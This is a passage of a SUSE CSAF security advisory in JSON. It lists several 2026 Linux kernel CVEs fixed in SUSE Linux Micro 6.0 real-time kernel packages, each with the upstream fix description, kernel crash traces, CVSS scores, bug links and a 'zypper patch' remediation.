"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-22998"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23003",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23003"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_tunnel: use skb_vlan_inet_prepare() in __ip6_tnl_rcv()\n\nBlamed commit did not take care of VLAN encapsulations\nas spotted by syzbot [1].\n\nUse skb_vlan_inet_prepare() instead of pskb_inet_may_pull().\n\n[1]\n BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321\n __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321\n ip6ip6_dscp_ecn_decapsulate+0x16f/0x1b0 net/ipv6/ip6_tunnel.c:729\n __ip6_tnl_rcv+0xed9/0x1b50 net/ipv6/ip6_tunnel.c:860\n ip6_tnl_rcv+0xc3/0x100 net/ipv6/ip6_tunnel.c:903\n gre_rcv+0x1529/0x1b90 net/ipv6/ip6_gre.c:-1\n ip6_protocol_deliver_rcu+0x1c89/0x2c60 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1f4/0x4a0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n ip6_input+0x9c/0x330 net/ipv6/ip6_input.c:500\n ip6_mc_input+0x7ca/0xc10 net/ipv6/ip6_input.c:590\n dst_input include/net/dst.h:474 [inline]\n ip6_rcv_finish+0x958/0x990 net/ipv6/ip6_input.c:79\n NF_HOOK include/linux/netfilter.h:318 [inline]\n ipv6_rcv+0xf1/0x3c0 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core net/core/dev.c:6139 [inline]\n __netif_receive_skb+0x1df/0xac0 net/core/dev.c:6252\n netif_receive_skb_internal net/core/dev.c:6338 [inline]\n netif_receive_skb+0x57/0x630 net/core/dev.c:6397\n tun_rx_batched+0x1df/0x980 drivers/net/tun.c:1485\n tun_get_user+0x5c0e/0x6c60 drivers/net/tun.c:1953\n tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0xbe2/0x15d0 fs/read_write.c:686\n ksys_write fs/read_write.c:738 [inline]\n __do_sys_write fs/read_write.c:749 [inline]\n __se_sys_write fs/read_write.c:746 [inline]\n __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746\n x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:4960 [inline]\n slab_alloc_node mm/slub.c:5263 [inline]\n kmem_cache_alloc_node_noprof+0x9e7/0x17a0 mm/slub.c:5315\n kmalloc_reserve+0x13c/0x4b0 net/core/skbuff.c:586\n __alloc_skb+0x805/0x1040 net/core/skbuff.c:690\n alloc_skb include/linux/skbuff.h:1383 [inline]\n alloc_skb_with_frags+0xc5/0xa60 net/core/skbuff.c:6712\n sock_alloc_send_pskb+0xacc/0xc60 net/core/sock.c:2995\n tun_alloc_skb drivers/net/tun.c:1461 [inline]\n tun_get_user+0x1142/0x6c60 drivers/net/tun.c:1794\n tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0xbe2/0x15d0 fs/read_write.c:686\n ksys_write fs/read_write.c:738 [inline]\n __do_sys_write fs/read_write.c:749 [inline]\n __se_sys_write fs/read_write.c:746 [inline]\n __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746\n x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nCPU: 0 UID: 0 PID: 6465 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(none)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23003",
"url": "https://www.suse.com/security/cve/CVE-2026-23003"
},
{
"category": "external",
"summary": "SUSE Bug 1257246 for CVE-2026-23003",
"url": "https://bugzilla.suse.com/1257246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23003"
},
{
"cve": "CVE-2026-23004",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23004"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndst: fix races in rt6_uncached_list_del() and rt_del_uncached_list()\n\nsyzbot was able to crash the kernel in rt6_uncached_list_flush_dev()\nin an interesting way [1]\n\nCrash happens in list_del_init()/INIT_LIST_HEAD() while writing\nlist-\u003eprev, while the prior write on list-\u003enext went well.\n\nstatic inline void INIT_LIST_HEAD(struct list_head *list)\n{\n\tWRITE_ONCE(list-\u003enext, list); // This went well\n\tWRITE_ONCE(list-\u003eprev, list); // Crash, @list has been freed.\n}\n\nIssue here is that rt6_uncached_list_del() did not attempt to lock\nul-\u003elock, as list_empty(\u0026rt-\u003edst.rt_uncached) returned\ntrue because the WRITE_ONCE(list-\u003enext, list) happened on the other CPU.\n\nWe might use list_del_init_careful() and list_empty_careful(),\nor make sure rt6_uncached_list_del() always grabs the spinlock\nwhenever rt-\u003edst.rt_uncached_list has been set.\n\nA similar fix is neeed for IPv4.\n\n[1]\n\n BUG: KASAN: slab-use-after-free in INIT_LIST_HEAD include/linux/list.h:46 [inline]\n BUG: KASAN: slab-use-after-free in list_del_init include/linux/list.h:296 [inline]\n BUG: KASAN: slab-use-after-free in rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline]\n BUG: KASAN: slab-use-after-free in rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020\nWrite of size 8 at addr ffff8880294cfa78 by task kworker/u8:14/3450\n\nCPU: 0 UID: 0 PID: 3450 Comm: kworker/u8:14 Tainted: G L syzkaller #0 PREEMPT_{RT,(full)}\nTainted: [L]=SOFTLOCKUP\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: netns cleanup_net\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n INIT_LIST_HEAD include/linux/list.h:46 [inline]\n list_del_init include/linux/list.h:296 [inline]\n rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline]\n rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020\n addrconf_ifdown+0x143/0x18a0 net/ipv6/addrconf.c:3853\n addrconf_notify+0x1bc/0x1050 net/ipv6/addrconf.c:-1\n notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85\n call_netdevice_notifiers_extack net/core/dev.c:2268 [inline]\n call_netdevice_notifiers net/core/dev.c:2282 [inline]\n netif_close_many+0x29c/0x410 net/core/dev.c:1785\n unregister_netdevice_many_notify+0xb50/0x2330 net/core/dev.c:12353\n ops_exit_rtnl_list net/core/net_namespace.c:187 [inline]\n ops_undo_list+0x3dc/0x990 net/core/net_namespace.c:248\n cleanup_net+0x4de/0x7b0 net/core/net_namespace.c:696\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246\n \u003c/TASK\u003e\n\nAllocated by task 803:\n kasan_save_stack mm/kasan/common.c:57 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:78\n unpoison_slab_object mm/kasan/common.c:340 [inline]\n __kasan_slab_alloc+0x6c/0x80 mm/kasan/common.c:366\n kasan_slab_alloc include/linux/kasan.h:253 [inline]\n slab_post_alloc_hook mm/slub.c:4953 [inline]\n slab_alloc_node mm/slub.c:5263 [inline]\n kmem_cache_alloc_noprof+0x18d/0x6c0 mm/slub.c:5270\n dst_alloc+0x105/0x170 net/core/dst.c:89\n ip6_dst_alloc net/ipv6/route.c:342 [inline]\n icmp6_dst_alloc+0x75/0x460 net/ipv6/route.c:3333\n mld_sendpack+0x683/0xe60 net/ipv6/mcast.c:1844\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entr\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23004",
"url": "https://www.suse.com/security/cve/CVE-2026-23004"
},
{
"category": "external",
"summary": "SUSE Bug 1257231 for CVE-2026-23004",
"url": "https://bugzilla.suse.com/1257231"
},
{
"category": "external",
"summary": "SUSE Bug 1258655 for CVE-2026-23004",
"url": "https://bugzilla.suse.com/1258655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23004"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns 